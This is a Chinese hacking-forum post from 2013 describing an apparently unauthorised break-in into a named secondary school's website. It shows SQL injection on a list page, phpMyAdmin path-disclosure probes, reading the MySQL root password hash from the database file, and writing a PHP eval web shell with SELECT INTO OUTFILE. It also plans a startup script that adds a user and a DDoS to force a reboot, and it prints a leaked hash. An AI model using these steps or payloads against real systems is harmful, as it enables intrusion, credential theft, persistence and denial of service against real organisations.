找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2739|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏! a2 r3 ]6 H% x' k2 A* D5 Z' x7 K$ v
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!, V8 `6 k0 ^( K. Z2 U% Z0 P6 N
% f# a8 L/ Q/ N9 A- u
9 D% l3 C1 p% T. {
: r* u- }' S. |: ^% Y. }8 D
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
1 y# `6 H9 T+ J2 s8 z7 i& S) Q/ I( p" ?7 v: r- j
那么想可以直接写入shell ,getshell有几个条件:
! G  V* L# K' S% n3 u+ j" z$ K
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF% v8 h0 ]& v. c% \+ s. t) X5 ^

  w7 R: L/ p, i试着爆绝对路径:9 d0 g/ S* P" o+ l3 y2 [+ q$ N' i$ E) _
1./phpMyAdmin/index.php?lang[]=1  
0 [8 k# k9 w$ {( z2./phpMyAdmin/phpinfo.php  
) S% X- h9 Y" O- J* r! n1 s8 e# J/ }3./load_file()  0 Z. Q4 |% E6 x7 i* X7 g7 i: W
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  2 W: R+ p" W4 a+ ]# n; L4 n: G1 d
5./phpmyadmin/libraries/select_lang.lib.php  
" ?2 x  x0 w: V7 Q5 I* }6./phpmyadmin/libraries/lect_lang.lib.php  
$ V+ h6 L  k4 d) z1 N4 }7./phpmyadmin/libraries/mcrypt.lib.php   5 u9 Z  c/ ]6 P0 U# W
8./phpmyadmin/libraries/export/xls.php  $ N% V& Q5 B' z/ C& L& W4 T
# s2 g% z0 D: M( v
均不行...........................; R- v! C/ w( O6 V" |. ?
- [# h6 `* c% R2 {
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php8 P) J1 T; x2 W* @5 o1 v- F* R

+ u8 A5 Z6 a( D权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
5 l* L1 K* P$ d8 F
& D/ d, m0 l4 T* Z默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败" K$ Z! a8 \) i* U( H. u
9 D2 H. E4 o2 I* ]/ n# C8 G0 r$ T
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........8 t7 n0 x4 b- }# y

, r% P6 F$ `( C# {) ~: W% k+ C想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 8 S8 L$ j. H1 B0 Z  r% l8 F

- s- g! Q3 M6 X8 ?1 o. `3 m; }http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini * c& V% O7 E7 ?! l* t3 G7 a
2 L9 g2 y* i$ [2 v5 \- I
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( y9 d  _; f% H3 q

0 X7 D, @% A' L1 p& I, V8 H! V' l成功读到root密码:
; A& a! f* S8 L. n
6 q) I" q( e7 ?& [6 u/ L5 q2 q$ d0 v. s17---- r(0072)2 A) k" g6 B% }1 l% U- R# C8 `
18---- o(006f)
! d- C- ?* q% I19---- o(006f)
( x4 d1 q2 z- Q( k( f20---- t(0074)" `; q, S9 g; Q9 h  w8 M
21---- *(002a); x( d7 o4 z; [/ z, i, k
22---- 8(0038)8 d% k: H9 H0 U8 [
23---- 2(0032)8 @+ I% ^) m8 i1 H
24---- E(0045)* \9 q* m6 v0 ^+ e) R, V
25---- 1(0031)0 ^9 E. A: R& b0 K8 G7 o/ X& Z
26---- C(0043): s6 `" r+ h, ~& r) _& B
27---- 5(0035)$ }! L9 N+ m. g3 ^" y8 d/ z( k
28---- 8(0038)
" N" c2 v7 z& o: H7 y4 J+ O. I6 K& r29---- 2(0032)
% _6 a- `- W  U5 `. F: a9 {30---- 8(0038)% S2 l' r- l% w8 B2 ~( }2 i
31---- A(0041)
: A  l( _* X$ w; {. |9 b- K32---- 9(0039)
4 M/ v: r) z6 J5 ^: z: v) Y+ w# t33---- B(0042)
9 m7 D1 |( o& y' t2 W34---- 5(0035)- B1 p+ J2 p/ y& L2 U: w6 B! v* v& K7 t
35---- 4(0034)
# F5 x; \; ]" F  |$ M5 P, |36---- 8(0038)
* r8 c  x* P8 I+ e; R37---- 6(0036)
( r7 G4 E$ H" S38---- 4(0034)' s; M; u; u- d) `: i
39---- 9(0039)% Z* F3 O0 q, p
40---- 1(0031)6 q) q; b* R/ ^! X
41---- 1(0031)
  R$ y/ h/ m/ }  E/ T) m0 Z4 ^; d42---- 5(0035)" h! G! l4 T' p3 g
43---- 3(0033)
, ^' K8 R* v5 f0 x1 I44---- 5(0035)7 k' ?0 O2 l; ]2 M$ w
45---- 9(0039)& R. I# s7 o  m! S
46---- 8(0038)
3 I2 O; j, K! c: d47---- F(0046)- m% `8 A9 A+ h* i1 s3 c
48---- F(0046)3 i# t1 a. N/ [  [( J9 h
49---- 4(0034)
; M& Y- p2 |0 ]" N  y4 o& Q# W2 Q* F! o50---- F(0046)8 ?1 [) W1 d" b
51---- 0(0030)
' ]8 Q5 |  }4 w% M7 l52---- 3(0033)
% c! N4 |# F1 g53---- 2(0032)9 h0 |& @5 }; h8 f9 u+ [
54---- A(0041); j& ]8 m+ M/ T/ p/ c
55---- 4(0034)8 O4 E, A/ p1 m9 ^. F( j
56---- A(0041)5 B* x# ~9 T2 Z9 {4 d1 P* a
57---- B(0042). S& N9 x: d* S9 L5 ^; D) e
58---- *(0044)
7 Q% o* W5 L) N/ K59---- *(0035)+ G/ V9 D: O/ ]3 [# J" T
60---- *(0041)& s# A: h. Z* p& C; o5 O* u
61---- *0032)% ]. x) l) e9 E- }
$ v2 p! ~  N1 x) T# x  c% _2 N
解密后成功登陆phpmyamin  u4 p- s. ~8 G. N* p( J
                          4 l$ l% q% X. F) y1 {
: o2 @# }- s8 ^2 Q2 G; ?8 g
                             
$ R6 w' s6 ], X6 \4 M
9 X- T" p; F" H' P8 N  N" v找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'! F* J1 \* f) g# l3 W
  d) }1 P5 n+ c
成功执行,拿下shell,菜刀连接:
7 R  l7 N) ^. t9 i6 c: j
# y0 R, L# x" U! S9 E服务器不支持asp,aspx,php提权无果...................
! F- U! O! a( w3 n. t0 R
% o% Q" H! l9 r! I7 i8 H- N4 ^但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:5 K( j5 H+ k) k* D( j
服务器上已经有个隐藏帐号了

! I# L3 ^8 r9 D2 U3 n
别名     administrators6 v/ K2 C2 s+ E6 p
注释     管理员对计算机/域有不受限制的完全访问权

! g" {/ u2 l6 g/ S
成员
! q5 E3 g% a4 `6 u# l
-------------------------------------------------------------------------------
$ Q' I2 J$ F8 J- r5 ^" Radmin# _, M% C! `7 t' E; m; k
Administrator; q% l% X8 j& T, Q3 `/ K
slipper$& ?) i0 f" J2 E  i, a, k5 u: G: i
sqluser
% Y, _- K; Y" g0 S命令成功完成。
6 g5 ]5 e  p4 C) l! P% N, Y; A, F% k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
" Q) Z$ k' [; }/ Q3 `& m
9 p2 @( G- M( q6 Q& }: |. _2 y, ~3 ]ddos服务器重启,不然就只能坐等服务器重启了...............................
+ b% n+ @8 a% T$ V$ B- h: G4 `4 a% A. }( w+ V6 r9 Z
      

! h  t, x" e% Y5 |

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表